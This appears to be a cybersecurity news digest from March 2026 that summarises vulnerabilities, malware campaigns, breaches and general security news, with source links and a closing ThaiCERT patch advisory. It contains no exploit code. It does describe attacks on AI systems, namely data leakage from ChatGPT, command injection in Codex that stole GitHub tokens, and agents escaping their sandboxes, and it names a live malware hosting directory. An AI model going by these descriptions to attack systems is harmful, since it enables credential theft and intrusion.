Vulnerabilities
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-3055 Citrix NetScaler Out-of-Bounds Read Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/03/30/cisa-adds-one-known-exploited-vulnerability-catalog
When AI Trust Breaks: The ChatGPT Data Leakage Flaw That Redefined AI Vendor Security Trust
"AI assistants like ChatGPT have quickly become trusted environments for handling some of the most sensitive data people own. Users discuss medical symptoms, upload financial records, analyze contracts, and paste internal documents—often assuming that what they share remains safely contained within the platform. That assumption was challenged when new research uncovered a previously unknown vulnerability that enabled silent data leakage from ChatGPT conversations without user knowledge or consent. While the issue has since been fully resolved by OpenAI, the discovery delivers a much broader lesson for enterprises and security leaders: AI tools should not be assumed secure by default."
https://blog.checkpoint.com/research/when-ai-trust-breaks-the-chatgpt-data-leakage-flaw-that-redefined-ai-vendor-security-trust/
https://research.checkpoint.com/2026/chatgpt-data-leakage-via-a-hidden-outbound-channel-in-the-code-execution-runtime/
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html
https://www.theregister.com/2026/03/30/openai_chatgpt_dns_data_snuggling_flaw/ - Storm Brews Over Critical, No-Click Telegram Flaw
"A storm is brewing over a purported critical Telegram Messenger flaw that allows for full system hijack, with full details of the unpatched vulnerability not set to be disclosed until July. The vulnerability, which could impact some 1 billion users of the popular chat app, was discovered by researcher Michael DePlante of the Trend Micro Zero Day Initiative (ZDI). ZDI first revealed the existence of the flaw, which it tracks as ZDI-CAN-30207, on Thursday and set a deadline for full disclose on July 26."
https://www.darkreading.com/application-security/storm-brews-critical-no-click-telegram-flaw
https://securityaffairs.com/190167/security/its-a-mystery-alleged-unpatched-telegram-zero-day-allows-device-takeover-but-telegram-denies.html - How Command Injection Vulnerability In OpenAI Codex Leads To GitHub Token Compromise
"BeyondTrust Phantom Labs
has discovered a critical command injection vulnerability in OpenAI's Codex cloud environment that exposed sensitive GitHub credential data. The vulnerability exists within the task creation HTTP request, which allows an attacker to inject arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub. Through automated techniques, this exploit can scale to compromise multiple users interacting with a shared environment or GitHub repository. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been remediated in coordination with OpenAI’s security team."
https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token
https://hackread.com/openai-codex-vulnerability-steal-github-tokens/ - StrongSwan CVE-2026-25075: Integer Underflow In VPN Authentication
"Bishop Fox researchers successfully exploited an integer underflow vulnerability affecting the EAP-TTLS plugin in strongSwan versions 4.5.0 through 6.0.4. The vulnerability allows remote, unauthenticated attackers to crash the VPN server's IKE daemon through a carefully crafted EAP-TTLS message, resulting in denial of service. What makes this vulnerability particularly interesting is that exploitation often requires a two-phase attack. In some scenarios, a single malicious packet corrupts the heap but doesn't crash the daemon; only a second connection triggers the segmentation fault. Our researchers also developed a safe detection method that identifies vulnerable servers without causing any disruption, which you can download here."
https://bishopfox.com/blog/strongswan-cve-2026-25075-integer-underflow-in-vpn-authentication
https://hackread.com/strongswan-flaw-attackers-crash-vpn-integer-underflow/
Malware
- Critical Fortinet Forticlient EMS Flaw Now Exploited In Attacks
"Attackers are now actively exploiting a critical vulnerability in Fortinet's FortiClient EMS platform, according to threat intelligence company Defused. Tracked as CVE-2026-21643, this SQL injection vulnerability allows unauthenticated threat actors to execute arbitrary code or commands on unpatched systems through low-complexity attacks targeting the FortiClientEMS GUI (web interface) via maliciously crafted HTTP requests. "Fortinet Forticlient EMS CVE-2026-21643 - currently marked as not exploited on CISA and other Known Exploited Vulnerabilities (KEV) lists - has seen first exploitation already 4 days ago according to our data," Defused warned over the weekend."
https://www.bleepingcomputer.com/news/security/critical-fortinet-forticlient-ems-flaw-now-exploited-in-attacks/
https://securityaffairs.com/190158/security/critical-fortinet-forticlient-ems-flaw-exploited-for-remote-code-execution.html
https://www.helpnetsecurity.com/2026/03/30/forticlient-ems-cve-2026-21643-reported-exploitation/ - Hacked Hospitals, Hidden Spyware: Iran Conflict Shows How Digital Fight Is Ingrained In Warfare
"As they fled an Iranian missile strike, some Israelis with Android phones received a text offering a link to real-time information about bomb shelters. But instead of a helpful app, the link downloaded spyware giving hackers access to the device’s camera, location and all its data. The operation, attributed to Iran, showed sophisticated coordination and is just the latest tactic in a cyber conflict that pits the U.S. and Israel against Iran and its digital proxies. As Iran and its supporters seek to use their cyber capabilities to compensate for their military disadvantages, they are demonstrating how disinformation, artificial intelligence and hacking are now ingrained in modern warfare."
https://www.securityweek.com/hacked-hospitals-hidden-spyware-iran-conflict-shows-how-digital-fight-is-ingrained-in-warfare/ - Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
"“CTRL” is a custom-built .NET remote access toolkit developed by a Russian-speaking operator and distributed via weaponized LNK files disguised as private key folders. The toolkit was discovered through Censys open directory scanning, which identified an exposed payload hosting directory at hui228.ru:82/hosted/ containing three .NET executables. Together, the executables provide encrypted payload loading, credential harvesting via a polished Windows Hello phishing UI, keylogging, RDP session hijacking, and reverse proxy tunneling through FRP."
https://censys.com/blog/under-ctrl-dissecting-a-previously-undocumented-russian-net-access-framework/
https://thehackernews.com/2026/03/russian-ctrl-toolkit-delivered-via.html - RoadK1ll: A WebSocket Based Pivoting Implant
"During analysis of a recent intrusion, the Blackpoint Response Operations Center (BROC) identified a Node.js based implant deployed within the compromised environment which the BROC is tracking as RoadK1ll. At a glance, it might not look like your typical piece of malware, as there are no large command sets or obvious operator tooling built in. Instead, RoadK1ll is built to solve a very specific problem for the attacker: maintaining reliable, flexible access into an internal network after initial compromise. RoadK1ll is a Node.js-based reverse tunneling implant that establishes an outbound WebSocket connection to attacker-controlled infrastructure and uses that connection to broker TCP traffic on demand. Unlike a traditional remote access trojan, it carries no large command set and requires no inbound listener on the victim host."
https://blackpointcyber.com/blog/roadk1ll-a-websocket-based-pivoting-implant/
https://www.bleepingcomputer.com/news/security/new-roadk1ll-websocket-implant-used-to-pivot-on-breached-networks/ - One Click Away: Inside a LinkedIn Phishing Attack
"You’re checking your inbox like any other day when a LinkedIn notification pops up, hinting at a promising opportunity. It feels exciting and completely normal to click. Yet with that single action, your login credentials may already be slipping into the hands of a cybercriminal. This is the danger hiding in plain sight: phishing emails that look so ordinary they disarm even the most cautious users. A moment of curiosity or urgency is all it takes for an attack to succeed. This is consistent with a recent trend observed by the Cofense Phishing Defense Center (PDC). The analysts in the PDC have identified a phishing campaign that uses LinkedIn message notifications to lure users into logging in to view a supposed opportunity, ultimately disguising itself to steal users’ credentials."
https://cofense.com/blog/one-click-away-inside-a-linkedin-phishing-attack - DeepLoad Malware Pairs ClickFix Delivery With AI-Generated Evasion
"ReliaQuest has observed the new “DeepLoad” malware being exploited in enterprise environments. What sets this campaign apart isn’t any single stand-out technique, but how the entire attack chain was engineered to defeat the controls most organizations rely on, turning one user action into persistent, credential-stealing access. In this report, we provide a full attack chain for DeepLoad, showing that newly surfaced threats can arrive operationally mature. Based on what we’ve observed, organizations must prioritize behavioral, runtime detection—not file-based scanning—to catch this campaign (and similar ones) early."
https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion/
https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
https://www.darkreading.com/cyberattacks-data-breaches/ai-powered-deepload-steals-credentials-evades-detection
https://cyberscoop.com/deepload-ai-malware-obfuscation-at-every-stage-reliaquest/
https://www.infosecurity-magazine.com/news/deepload-malware-clickfix-ai-code/ - Professional Networks Under Attack: Vietnam-Linked Actors Deploy PXA Stealer In Global Infostealer Campaign
"CRIL has been actively tracking a surge in PXA Stealer activity deployed in a sophisticated, financially motivated threat campaign attributed with high confidence to a Vietnam-based cybercriminal group. The primary targets in this campaign are job seekers across India, Bangladesh, the Netherlands, Sweden, and the United States. Threat actors leverage LinkedIn as their primary initial access vector, distributing fraudulent recruitment messages via compromised accounts that impersonate legitimate job opportunities."
https://cyble.com/blog/professional-networks-under-attack-by-infostealer/
Breaches/Hacks/Leaks
- Healthcare Tech Firm CareCloud Says Hackers Stole Patient Data
"Healthcare IT firm CareCloud has disclosed a data breach incident that exposed sensitive data and caused a network disruption lasting approximately eight hours. The New Jersey-based company said in a filing with the U.S. Securities and Exchange Commission (SEC) that the intrusion occurred on March 16 when hackers accessed its IT infrastructure. “On March 16, 2026, CareCloud, Inc. experienced a temporary network disruption in its CareCloud Health division that partially impacted the functionality and data access to 1 of its 6 electronic health record environments for approximately 8 hours until the Company fully restored all functionality and data access during that evening,” the company says in the SEC filing."
https://www.bleepingcomputer.com/news/security/healthcare-tech-firm-carecloud-says-hackers-stole-patient-data/
https://therecord.media/carecloud-hack-data-breach-sec
https://www.securityweek.com/healthcare-it-platform-carecloud-probing-potential-data-breach/ - Dark Web Market Lists Alleged 375TB Lockheed Martin Data For $600M
"Hackers are claiming to have stolen a trove of data belonging to Lockheed Martin, the world’s largest defense contractor and an American aerospace company. They are now selling it on the dark web. The situation began on March 26, 2026, when a Telegram account linked to a dark web marketplace known as Threat Market, which posts in both Russian and English, claimed it had been approached by a group described as “APT IRAN.” According to the post, the group requested infrastructure support to sell what was described as 375 terabytes of data allegedly taken from Lockheed Martin."
https://hackread.com/dark-web-market-375tb-lockheed-martin-data/
General News
- Why Risk Alone Doesn’t Get You To Yes
"I have been in security rooms for years, from military operations centers to corporate boardrooms. In all those years I can tell you that the hardest mission that most security leaders will face is not identifying a threat, but getting someone to act on it. We’re trained to see exposure before they are identified by others. We continually assess likely threats, evaluate impact, and design controls to prevent disruption long before it reaches operations or shareholders. That’s the job. But here’s what I’ve watched happen, over and over again: a security leader walks into a meeting with a technically sound brief, well-supported recommendations, and a clear picture of the risk. The room nods. The CFO asks for more context. The conversation gets tabled for next quarter."
https://www.helpnetsecurity.com/2026/03/30/cyber-security-executive-buy-in/ - Breaking Out: Can AI Agents Escape Their Sandboxes?
"Container sandboxes are part of routine AI agent testing and deployment. Agents use them to run code, edit files, and interact with system resources without direct access to the host. The SandboxEscapeBench benchmark, developed by researchers at the University of Oxford and the AI Security Institute, evaluates whether an agent with shell access can escape a container and reach the host system."
https://www.helpnetsecurity.com/2026/03/30/ai-agents-container-breakout-capabilities-research/
https://arxiv.org/pdf/2603.02277 - Don’t Count On Government Guidance After a Smart Home Breach
"People are filling their homes with internet-connected cameras, speakers, locks, and routers. When one of those devices is compromised, the next steps are often unclear. Researchers reviewing government cybersecurity advice in 11 countries found that most guidance focuses on prevention, leaving households with limited support after a breach. The analysis covers Australia, Austria, Canada, Finland, France, Germany, Japan, New Zealand, Singapore, the United Kingdom, and the United States."
https://www.helpnetsecurity.com/2026/03/30/smart-home-cybersecurity-recovery-guidance-gap/ - Iranian Cyberthreats Test US Infrastructure Defenses
"Warnings from Iranian-linked hacking groups threatening "irreparable damages" to U.S. water systems are raising concerns across the federal cybersecurity community - as officials weigh both the credibility of the threat and the government's ability to respond amid ongoing cyber resource strains. The reported threat involves a coalition of pro-Iranian hacking groups signaling potential retaliation against U.S. critical infrastructure - including water and wastewater systems - if geopolitical tensions continue to escalate." - **https://www.bankinfosecurity.com/iranian-cyberthreats-test-us-infrastructure-defenses-a-31299
- Hybrid Warfare 2026: When Cyber Operations And Kinetic Attacks Converge**
"In 2026, hybrid warfare is no longer a theoretical construct discussed in policy circles; it is shaping geopolitical conflict in real time. The convergence of cyber warfare and kinetic attacks has transformed how nations project power, blending missiles, malware, and misinformation into unified campaigns. What distinguishes modern hybrid warfare from earlier conflicts is not just the presence of digital operations, but their synchronization with physical strikes to produce layered, systemic disruption. Nowhere is this more evident than in the Middle East, where escalating tensions have turned the region into a proving ground for cyber-physical warfare."
https://cyble.com/blog/hybrid-warfare-2026-cyber-kinetic-threats/ - Manufacturing And Healthcare Share Struggles With Passwords
"Two disparate industries, manufacturing and healthcare, share several weaknesses that lead to significant security gaps, especially in password hygiene. To address in the short term will require shifting security culture mindsets. The industries are two of the biggest ransomware targets. Black Kite's "2025 Manufacturing Research Report" found that manufacturing was the No. 1 target for ransomware groups four years in a row."
https://www.darkreading.com/cyber-risk/manufacturing-and-healthcare-share-struggles-with-passwords - TeamPCP’s Attack Spree Slows, But Threat Escalates With Ransomware Pivot
"TeamPCP’s destructive run of supply chain breaches has stopped, for now: it has been three days since the group published malicious versions of Telnyx’s SDK on PyPI, and there haven’t been reports of new open-source project compromises."
https://www.helpnetsecurity.com/2026/03/30/teampcp-supply-chain-attacks-ransomware/ - Silent Drift: How LLMs Are Quietly Breaking Organizational Access Control
"Business efficiency demands maximum use of AI assistance, but where policy as code is concerned, AI can introduce serious policy flaws. The shift to policy as code for organizational security, compliance, and operational rules, is being followed by increased use of LLM artificial intelligence to help produce the raw code. This makes sense. A primary purpose of AI within business is to improve human efficiency, and writing policy in languages like Rego or Cedar is not easy. AI is increasingly used to streamline the process."
https://www.securityweek.com/silent-drift-how-llms-are-quietly-breaking-organizational-access-control/ - Audit Finds Application Security Issues Are Worse Than Ever
"An audit of 947 commercial codebases spanning 17 industries finds the number of vulnerabilities inside applications has surged a startling 107% over the past year. Conducted by Black Duck Software, the audit also finds there are now, on average, 581 vulnerabilities per codebase. Alas, many of these vulnerabilities can be traced back to open-source software components that create dependencies in code bases that are challenging to fix because the code is managed by an independent maintainer that might not yet have created a patch to address the issue."
https://blog.barracuda.com/2026/03/30/audit-application-security-issues-open-source
อ้างอิง
Electronic Transactions Development Agency (ETDA) 
ThaiCERT ขอแจ้งเตือนองค์กรที่ใช้งานผลิตภัณฑ์ของ Citrix ให้เร่งดำเนินการตรวจสอบและอัปเดตแพตช์ทันที เพื่อป้องกันความเสี่ยงจากการรั่วไหลของข้อมูลและการเข้าถึงระบบโดยไม่ได้รับอนุญาต
